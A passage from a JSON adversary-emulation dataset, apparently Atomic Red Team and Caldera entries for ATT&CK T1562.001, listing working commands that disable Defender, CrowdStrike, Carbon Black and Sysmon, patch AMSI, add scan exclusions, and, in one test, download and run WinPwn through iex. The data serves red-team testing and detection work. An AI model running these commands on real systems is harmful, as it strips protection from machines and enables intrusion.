$true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n", + "source": "data/abilities/defense-evasion/b007f6e8-4a87-4440-8888-29ceab047d9b.yml", + "name": "Disable Windows Defender All" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.001", + "display_name": "Impair Defenses: Disable or Modify Tools", + "atomic_tests": [ + { + "name": "Disable syslog", + "auto_generated_guid": "4ce786f8-e601-44b5-bfae-9ebb15a7d1c8", + "description": "Disables syslog collection\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "package_checker": { + "description": "Package checking command for linux.", + "type": "String", + "default": "(rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed)" + }, + "package_installer": { + "description": "Package installer command for linux. Default yum", + "type": "String", + "default": "(which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)" + }, + "flavor_command": { + "description": "Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog", + "type": "String", + "default": "systemctl stop rsyslog ; systemctl disable rsyslog" + }, + "cleanup_command": { + "description": "Command to enable syslog collection. Default newer rsyslog commands. 
i.e older command = service rsyslog start ; chkconfig rsyslog on", + "type": "String", + "default": "systemctl start rsyslog ; systemctl enable rsyslog" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Package with rsyslog must be on system\n", + "prereq_command": "if #{package_checker} > /dev/null; then exit 0; else exit 1; fi\n", + "get_prereq_command": "sudo #{package_installer} \n" + } + ], + "executor": { + "command": "#{flavor_command}\n", + "cleanup_command": "#{cleanup_command}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable Cb Response", + "auto_generated_guid": "ae8943f7-0f8d-44de-962d-fbc2e2f03eb8", + "description": "Disable the Cb Response service\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n service cbdaemon stop\n chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n systemctl stop cbdaemon\n systemctl disable cbdaemon\nfi\n", + "name": "sh" + } + }, + { + "name": "Disable SELinux", + "auto_generated_guid": "fc225f36-9279-4c39-b3f9-5141ab74f8d8", + "description": "Disables SELinux enforcement\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "setenforce 0\n", + "cleanup_command": "setenforce 1\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Stop Crowdstrike Falcon on Linux", + "auto_generated_guid": "828a1278-81cc-4802-96ab-188bf29ca77d", + "description": "Stop and disable Crowdstrike Falcon on Linux\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "sudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n", + "cleanup_command": "sudo systemctl enable falcon-sensor.service\nsudo systemctl start falcon-sensor.service\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable Carbon Black Response", + 
"auto_generated_guid": "8fba7766-2d11-4b4a-979a-1e3d9cc9a88c", + "description": "Disables Carbon Black Response\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist\nsudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist\n", + "cleanup_command": "sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist\nsudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable LittleSnitch", + "auto_generated_guid": "62155dd8-bb3d-4f32-b31c-6532ff3ac6a3", + "description": "Disables LittleSnitch\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n", + "cleanup_command": "sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable OpenDNS Umbrella", + "auto_generated_guid": "07f43b33-1e15-4e99-be70-bc094157c849", + "description": "Disables OpenDNS Umbrella\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n", + "cleanup_command": "sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable macOS Gatekeeper", + "auto_generated_guid": "2a821573-fb3f-4e71-92c3-daac7432f053", + "description": "Disables macOS Gatekeeper\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo spctl --master-disable\n", + "cleanup_command": "sudo spctl --master-enable\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Stop and unload Crowdstrike Falcon on macOS", + "auto_generated_guid": 
"b3e7510c-2d4c-4249-a33f-591a2bc83eef", + "description": "Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "falcond_plist": { + "description": "The path of the Crowdstrike Falcon plist file", + "type": "Path", + "default": "/Library/LaunchDaemons/com.crowdstrike.falcond.plist" + }, + "userdaemon_plist": { + "description": "The path of the Crowdstrike Userdaemon plist file", + "type": "Path", + "default": "/Library/LaunchDaemons/com.crowdstrike.userdaemon.plist" + } + }, + "executor": { + "command": "sudo launchctl unload #{falcond_plist}\nsudo launchctl unload #{userdaemon_plist}\n", + "cleanup_command": "sudo launchctl load -w #{falcond_plist}\nsudo launchctl load -w #{userdaemon_plist}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Unload Sysmon Filter Driver", + "auto_generated_guid": "811b3e76-c41b-430c-ac0d-e2380bfaa164", + "description": "Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. 
To verify successful execution, o verify successful execution,\nrun the prereq_command's and it should fail with an error of \"sysmon filter must be loaded\".\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sysmon_driver": { + "description": "The name of the Sysmon filter driver (this can change from the default)", + "type": "String", + "default": "SysmonDrv" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sysmon must be downloaded\n", + "prereq_command": "if ((cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") -or (Test-Path $env:Temp\\Sysmon\\Sysmon.exe)) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/Sysmon.zip\" -OutFile \"$env:TEMP\\Sysmon.zip\"\nExpand-Archive $env:TEMP\\Sysmon.zip $env:TEMP\\Sysmon -Force\nRemove-Item $env:TEMP\\Sysmon.zip -Force\n" + }, + { + "description": "sysmon must be Installed\n", + "prereq_command": "if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "if(cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") { C:\\Windows\\Sysmon.exe -accepteula -i } else\n{ Set-Location $env:TEMP\\Sysmon\\; .\\Sysmon.exe -accepteula -i}\n" + }, + { + "description": "sysmon filter must be loaded\n", + "prereq_command": "if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "sysmon -u\nsysmon -accepteula -i\n" + } + ], + "executor": { + "command": "fltmc.exe unload #{sysmon_driver}\n", + "cleanup_command": "sysmon -u -i > nul 2>&1\nsysmon -i -accepteula -i > nul 2>&1\n%temp%\\Sysmon\\sysmon.exe -u > nul 2>&1\n%temp%\\Sysmon\\sysmon.exe -accepteula -i > nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Uninstall Sysmon", + "auto_generated_guid": "a316fb2e-5344-470d-91c1-23e15c374edc", + "description": "Uninstall Sysinternals Sysmon for Defense 
Evasion\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sysmon_exe": { + "description": "The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)", + "type": "Path", + "default": "PathToAtomicsFolder\\T1562.001\\bin\\sysmon.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sysmon executable must be available\n", + "prereq_command": "if(cmd /c where sysmon) {exit 0} else {exit 1}\n", + "get_prereq_command": "$parentpath = Split-Path \"#{sysmon_exe}\"; $zippath = \"$parentpath\\Sysmon.zip\"\nNew-Item -ItemType Directory $parentpath -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/Sysmon.zip\" -OutFile \"$zippath\"\nExpand-Archive $zippath $parentpath -Force; Remove-Item $zippath\nif(-not ($Env:Path).contains($parentpath)){$Env:Path += \";$parentpath\"}\n" + }, + { + "description": "Sysmon must be installed\n", + "prereq_command": "if(cmd /c sc query sysmon) { exit 0} else { exit 1}\n", + "get_prereq_command": "cmd /c sysmon -i -accepteula\n" + } + ], + "executor": { + "command": "sysmon -u\n", + "cleanup_command": "sysmon -i -accepteula >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "AMSI Bypass - AMSI InitFailed", + "auto_generated_guid": "695eed40-e949-40e5-b306-b4031e4154bd", + "description": "Any easy way to bypass AMSI inspection is it patch the dll in memory setting the \"amsiInitFailed\" function to true.\nUpon execution, no output is displayed.\n\nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n", + "cleanup_command": 
"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n", + "name": "powershell" + } + }, + { + "name": "AMSI Bypass - Remove AMSI Provider Reg Key", + "auto_generated_guid": "13f09b91-c953-438e-845b-b585e51cac9b", + "description": "With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis test removes the Windows Defender provider registry key. Upon execution, no output is displayed.\nOpen Registry Editor and navigate to \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\\" to verify that it is gone.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Remove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\n", + "cleanup_command": "New-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\" -Name \"{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -ErrorAction Ignore | Out-Null\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Disable Arbitrary Security Windows Service", + "auto_generated_guid": "a1230893-56ac-4c81-b644-2108e982f8f5", + "description": "With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.\nChange the service_name input argument for your AV solution. 
Upon exeuction, infomration will be displayed stating the status of the service.\nTo verify that the service has stopped, run \"sc query McAfeeDLPAgentService\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "The name of the service to stop", + "type": "String", + "default": "McAfeeDLPAgentService" + } + }, + "executor": { + "command": "net.exe stop #{service_name}\nsc.exe config #{service_name} start= disabled\n", + "cleanup_command": "sc.exe config #{service_name} start= auto >nul 2>&1\nnet.exe start #{service_name} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender ATP PowerShell", + "auto_generated_guid": "6b8df440-51ec-4d53-bf83-899591c9b5d7", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled\nin Windows settings.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n", + "cleanup_command": "Set-MpPreference -DisableRealtimeMonitoring 0\nSet-MpPreference -DisableBehaviorMonitoring 0\nSet-MpPreference -DisableScriptScanning 0\nSet-MpPreference -DisableBlockAtFirstSeen 0\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Command Prompt", + "auto_generated_guid": "aa875ed4-8935-47e2-b2c5-6ec00ab220d2", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.\nHowever, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. 
Upon execution, \"Access Denied\"\nwill be displayed twice and the WinDefend service status will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "sc stop WinDefend\nsc config WinDefend start=disabled\nsc query WinDefend\n", + "cleanup_command": "sc start WinDefend >nul 2>&1\nsc config WinDefend start=enabled >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Registry", + "auto_generated_guid": "1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45", + "description": "Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be\ngrayed out and have no info.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Set-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1\n", + "cleanup_command": "Set-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 0\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Disable Microsoft Office Security Features", + "auto_generated_guid": "6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7", + "description": "Gorgon group may disable Office security features so that their code can run. 
Upon execution, an external document will not\nshow any warning before editing the document.\n\n\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "New-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableInternetFilesInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableUnsafeLocationsInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableAttachementsInPV\" -Value \"1\" -PropertyType \"Dword\"\n", + "cleanup_command": "Remove-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -ErrorAction Ignore | Out-Null\nRemove-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Remove Windows Defender Definition Files", + "auto_generated_guid": "3d47daaa-2f56-43e0-94cc-caf5d8d52a68", + "description": "Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.\nOn later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. 
On older versions of windows the\ncommand will say completed.\n\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Stop and Remove Arbitrary Security Windows Service", + "auto_generated_guid": "ae753dda-0f15-4af6-a168-b9ba16143143", + "description": "Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "The name of the service to remove", + "type": "String", + "default": "McAfeeDLPAgentService" + } + }, + "executor": { + "command": "Stop-Service -Name #{service_name}\nRemove-Service -Name #{service_name}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Uninstall Crowdstrike Falcon on Windows", + "auto_generated_guid": "b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297", + "description": "Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "falcond_path": { + "description": "The Crowdstrike Windows Sensor path. The Guid always changes.", + "type": "Path", + "default": "C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe" + } + }, + "executor": { + "command": "if (Test-Path \"#{falcond_path}\") {. 
\"#{falcond_path}\" /repair /uninstall /quiet } else { Get-ChildItem -Path \"C:\\ProgramData\\Package Cache\" -Include \"WindowsSensor.exe\" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq \"Valid\" -and $sig.SignerCertificate.DnsNameList -eq \"CrowdStrike, Inc.\") { . \"$_\" /repair /uninstall /quiet; break;}}}", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Evade Scanning -Folder", + "auto_generated_guid": "0b19f4ee-de90-4059-88cb-63c800c683ed", + "description": "Malware can exclude a specific path from being scanned and evading detection. \nUpon successul execution, the file provided should be on the list of excluded path. \nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionPath \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "excluded_folder": { + "description": "This folder will be excluded from scanning", + "type": "Path", + "default": "C:\\Temp" + } + }, + "executor": { + "command": "$excludedpath= \"#{excluded_folder}\"\nAdd-MpPreference -ExclusionPath $excludedpath", + "cleanup_command": "$excludedpath= \"#{excluded_folder}\"\nRemove-MpPreference -ExclusionPath $excludedpath\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Evade Scanning -Extension", + "auto_generated_guid": "315f4be6-2240-4552-b3e1-d1047f5eecea", + "description": "Malware can exclude specific extensions from being scanned and evading detection. 
\nUpon successful execution, the extension(s) should be on the list of excluded extensions.\nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "excluded_exts": { + "description": "A list of extension to exclude from scanning", + "type": "String", + "default": ".exe" + } + }, + "executor": { + "command": "$excludedExts= \"#{excluded_exts}\"\nAdd-MpPreference -ExclusionExtension $excludedExts", + "cleanup_command": "$excludedExts= \"#{excluded_exts}\"\nRemove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Evade Scanning -Process", + "auto_generated_guid": "a123ce6a-3916-45d6-ba9c-7d4081315c27", + "description": "Malware can exclude specific processes from being scanned and evading detection.\nUpon successful execution, the process(es) should be on the list of excluded processes. 
\nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess.\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "excluded_process": { + "description": "A list of processes to exclude from scanning", + "type": "String", + "default": "outlook.exe" + } + }, + "executor": { + "command": "$excludedProcess = \"#{excluded_process}\"\nAdd-MpPreference -ExclusionProcess $excludedProcess", + "cleanup_command": "$excludedProcess = \"#{excluded_process}\"\nRemove-MpPreference -ExclusionProcess $excludedProcess\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "office-365-Disable-AntiPhishRule", + "auto_generated_guid": "b9bbae2c-2ba6-4cf3-b452-8e8f908696f3", + "description": "Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.\n", + "supported_platforms": [ + "office-365" + ], + "input_arguments": { + "username": { + "description": "office-365 username", + "type": "String", + "default": null + }, + "password": { + "description": "office-365 password", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ExchangeOnlineManagement PowerShell module must be installed\n", + "prereq_command": "$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}\n", + "get_prereq_command": "Install-Module -Name ExchangeOnlineManagement\nImport-Module ExchangeOnlineManagement\n" + } + ], + "executor": { + "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\n$test = Get-AntiPhishRule\nDisable-AntiPhishRule -Identity $test.Name -Confirm:$false\nGet-AntiPhishRule\n", + 
"cleanup_command": "if(\"#{password}\" -ne \"\") {\n$secure_pwd = (\"#{password}\" + \"\") | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\n$test = Get-AntiPhishRule\nEnable-AntiPhishRule -Identity $test.Name -Confirm:$false\nGet-AntiPhishRule\n} \n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Disable Windows Defender with DISM", + "auto_generated_guid": "871438ac-7d6e-432a-b27d-3e7db69faf58", + "description": "The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. \nDISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.\nA successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.\nThis method will remove Defender and it's package.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Disable Defender with Defender Control", + "auto_generated_guid": "178136d8-2778-4d7a-81f3-d517053a4fd6", + "description": "Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "DefenderID": { + "description": "Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. 
The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window).", + "type": "String", + "default": "FFFF" + }, + "DefenderControlExe": { + "description": "Path to Defender Control software version 1.6.", + "type": "String", + "default": "$env:temp\\DefenderControl\\DefenderControl\\DefenderControl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Defender Control must be installed on the machine. \n", + "prereq_command": "if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Start-BitsTransfer -Source \"https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip\" -Destination \"$env:temp\\defendercontrol.zip\" -dynamic\nexpand-archive -LiteralPath \"$env:temp\\defendercontrol.zip\" -DestinationPath \"$env:temp\\DefenderControl\"\n" + } + ], + "executor": { + "command": "cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null\n", + "cleanup_command": "cmd /c #{DefenderControlExe} /E | Out-Null\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Disable Defender Using NirSoft AdvancedRun", + "auto_generated_guid": "81ce22fd-9612-4154-918e-8a1f285d214d", + "description": "Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html\nThis Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.\nSee https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\nUpon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk. 
\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "AdvancedRun_Location": { + "description": "Path of Advanced Run executable", + "type": "Path", + "default": "$env:temp\\AdvancedRun.exe" + }, + "delete_defender_folder": { + "description": "Set to 1 to also delete the Windows Defender folder", + "type": "Integer", + "default": 0 + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Advancedrun.exe must exist at #{AdvancedRun_Location}\n", + "prereq_command": "if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"http://www.nirsoft.net/utils/advancedrun.zip\" -OutFile \"$env:temp\\advancedrun.zip\"\nExpand-Archive -path \"$env:temp\\advancedrun.zip\" -destinationpath \"$env:temp\\\" -Force\n" + } + ], + "executor": { + "command": "Try {cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", + "cleanup_command": "Try {cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"start WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Kill antimalware protected processes using Backstab", + "auto_generated_guid": "24a12b91-05a7-4deb-8d7f-035fa98591bc", + "description": "Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise 
not possible to kill.\nhttps://github.com/Yaxser/Backstab", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_name": { + "description": "Name of the protected process you want to kill/terminate.", + "type": "string", + "default": "MsMpEng.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Backstab64.exe should exist in %temp%", + "prereq_command": "if (Test-Path $env:temp\\Backstab64.exe) {exit 0} else {exit 1}", + "get_prereq_command": "Start-BitsTransfer -Source \"https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe\" -Destination \"$env:temp\\Backstab64.exe\" -dynamic" + } + ], + "executor": { + "command": "& $env:temp\\Backstab64.exe -k -n #{process_name}", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "WinPwn - Kill the event log services for stealth", + "auto_generated_guid": "7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66", + "description": "Kill the event log services for stealth via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive ", + "name": "powershell" + } + } + ] + }, + { + "id": "3864fd22-5c63-41c9-bdbc-a66b5ffa3f5e", + "name": "Bypass ExecutionPolicy", + "description": "Ensure the ExecutionPolicy is turned to Bypass", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1562.001", + "name": "Impair Defenses: Disable or Modify Tools" + }, + "platforms": { + "windows": { + "psh": { + "command": "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo 
$shell.sendkeys(\"Y`r`n\")" + } + } + } + }, + { + "id": "49470433-30ce-4714-a44b-bea9dbbeca9a", + "name": "Disable Windows Defender Real-Time Protection", + "description": "Disable Windows Defender Real-Time Protection", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1562.001", + "name": "Impair Defenses: Disable or Modify Tools" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh": { + "command": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", + "cleanup": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) { Set-MPPreference -DisableRealtimeMonitoring 0; } else { $service = Get-Service WinDefend -ErrorAction SilentlyContinue; if ($service) { Start-Service WinDefend; } else { echo \"Windows Defender service not found.\"; exit 1; }; };" + } + } + } + }, + { + "id": "b007f6e8-4a87-4440-8888-29ceab047d9b", + "name": "Disable Windows Defender All", + "description": "Disable Windows Defender All", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1562.001", + "name": "Impair Defenses: Disable or Modify Tools" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh": { + "command": 